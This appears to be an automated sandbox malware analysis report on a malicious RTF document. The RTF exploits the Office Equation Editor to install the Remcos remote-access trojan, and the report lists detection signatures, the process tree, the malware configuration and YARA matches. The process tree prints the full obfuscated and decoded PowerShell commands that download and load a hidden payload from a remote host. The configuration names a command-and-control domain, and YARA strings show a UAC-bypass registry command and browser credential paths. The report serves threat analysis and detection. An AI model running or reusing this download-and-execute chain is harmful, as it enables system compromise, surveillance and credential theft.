Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Overview

General Information

Sample name:	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf
Analysis ID:	1430888
MD5:	f97c50feb93e72f7d26909c1180de9f2
SHA1:	809c718c1685b18ace672b7aae0a3b9be1b9627b
SHA256:	0c724088f1514a0d94864926816ab77c638b1204f4f5651a04e6d26dfee04ea7
Tags:	rtf
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Sigma detected: Remcos

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Command shell drops VBS files

Connects to a pastebin service (likely for C&C)

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Creates autostart registry keys with suspicious values (likely registry only malware)

Delayed program exit found

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2452 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 1644 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 1096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 2040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQwBNDgTreFIDgTreLwDgTre3DgTreDcDgTreNgDgTre2DgTreDIDgTreLwDgTre2DgTreDIDgTreLgDgTre0DgTreDEDgTreMgDgTreuDgTreDDgTreDgTreMQDgTreyDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreFIDgTreTQBDDgTreEQDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 2824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CMR/77662/62.412.012.291//:ptth' , '1' , 'C:\ProgramData\' , 'RMCD','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

cmd.exe (PID: 3188 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\RMCD.vbs" MD5: AD7B9C14083B52BC532FBA5948342B98)

RegAsm.exe (PID: 3212 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

wscript.exe (PID: 3296 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\RMCD.vbs" MD5: 045451FA238A75305CC26AC982472367)

wscript.exe (PID: 3420 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\RMCD.vbs" MD5: 045451FA238A75305CC26AC982472367)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "remcjulia.duckdns.org:14645:1", "Assigned name": "Zynova", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-76C83U", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1d33:$obj2: \objdata 0x1d1f:$obj3: \objupdate

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.872587798.0000000000A01000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x24dbb8:$a1: Remcos restarted by watchdog! 0x2c63f8:$a1: Remcos restarted by watchdog! 0x24e130:$a3: %02i:%02i:%02i:%03i 0x2c6970:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 2040	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2040	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf7b2e:$b2: ::FromBase64String( 0x16d4ba:$b2: ::FromBase64String( 0x16df19:$b2: ::FromBase64String( 0x16efa2:$b2: ::FromBase64String( 0x16f5e0:$b2: ::FromBase64String( 0x16fd9d:$b2: ::FromBase64String( 0x170360:$b2: ::FromBase64String( 0xf7996:$b3: ::UTF8.GetString( 0x16d31f:$b3: ::UTF8.GetString( 0x16dd7e:$b3: ::UTF8.GetString( 0x16ee07:$b3: ::UTF8.GetString( 0x16f445:$b3: ::UTF8.GetString( 0x16fc02:$b3: ::UTF8.GetString( 0x1701c5:$b3: ::UTF8.GetString( 0x77c21:$s1: -join 0x7ef3f:$s1: -join 0xa01c1:$s3: reverse 0xac79e:$s3: reverse 0x129dc6:$s3: reverse 0x12b445:$s3: reverse 0x12b710:$s3: reverse
Process Memory Space: powershell.exe PID: 2824	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2824	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 2824	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 2824	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x3ea294:$a1: Remcos restarted by watchdog! 0x3ea7ee:$a3: %02i:%02i:%02i:%03i 0x3eac1d:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 2824	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1c38b:$b2: ::FromBase64String( 0x1c943:$b2: ::FromBase64String( 0x1df0b:$b2: ::FromBase64String( 0x23bb7:$b2: ::FromBase64String( 0x2416e:$b2: ::FromBase64String( 0xaff32:$b2: ::FromBase64String( 0xebbbb:$b2: ::FromBase64String( 0xec8ff:$b2: ::FromBase64String( 0xedd27:$b2: ::FromBase64String( 0x22440c:$b2: ::FromBase64String( 0x3f8659:$b2: ::FromBase64String( 0x79e25e:$b2: ::FromBase64String( 0xf83643:$b2: ::FromBase64String( 0xf83c77:$b2: ::FromBase64String( 0xfa2ef3:$b2: ::FromBase64String( 0xfa34ab:$b2: ::FromBase64String( 0x1c1f0:$b3: ::UTF8.GetString( 0x1c7a8:$b3: ::UTF8.GetString( 0x1dd70:$b3: ::UTF8.GetString( 0x23a1c:$b3: ::UTF8.GetString( 0x23fd3:$b3: ::UTF8.GetString(
